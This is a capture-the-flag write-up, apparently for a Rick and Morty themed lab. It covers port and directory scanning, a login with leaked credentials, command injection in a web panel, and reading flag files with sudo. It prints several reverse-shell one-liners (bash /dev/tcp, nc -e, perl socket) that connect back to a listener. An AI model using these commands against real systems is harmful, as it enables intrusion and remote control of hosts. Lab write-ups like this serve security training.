- What is the first ingredient Rick needs?
Port scan
nmap -Pn <ip>
High port scan
nmap -p1000- -Pn <ip>
Service and OS scan
nmap -p 22,80,146,512,2045,2222 -A <ip>
Service:
- 22 OpenSSH7.2p2
- 80 Apache/2.4.18
OS: Ubuntu
Vulnerable scan
nmap -p 22,80 --script vuln <ip>
Access HTTP site
View source. I have a username “R1ckRul3s”
Inspect Element. Nothing useful
Scan for directory with dirb
dirb http://<ip>/
Access robots.txt, nothing much except “Wubbalubbadubdub”.
Further directory scan with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html
There’s login.php
Access login.php page
Login with R1ckRul3s:Wubbalubbadubdub
Success!!!
Let’s explore other panel, nothing much useful.
Back to command panel, let’s test it
whoami
It’s work. Now I can create reverse shell.
Create listener
nc -lvp 1234
Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/<ip>/1234 0>&1
Failed!!! I don’t have any shell.
Try another command
nc -e /bin/sh <ip> 1234
Failed!!! I don’t have any shell. Seems like I’m stuck with some filter.
Let’s try other way around. Exploring files.
ls
cat Sup3rS3cretPickl3Ingred.txt
Failed!!!
Try other command
less Sup3rS3cretPickl3Ingred.txt
ANS: mr. meeseek hair
2. Whats the second ingredient Rick needs?
Read clue.txt
less clue.txt
Check if I can run sudo
sudo -l
I can run anything
ls -la /home
ls -la /home/rick
less /home/rick/'second ingredients'
ANS: 1 jerry tear
3. Whats the final ingredient Rick needs?
Since I can run sudo. I can access root directory
sudo ls -la /root
sudo less /root/3rd.txt
4. Bonus for reverse shell
Sine I can’t use these:
- bash
- nc
- python
Try perl
perl -e 'use Socket;$i="<ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Now I have a shell.
sudo suid
Now I’m root.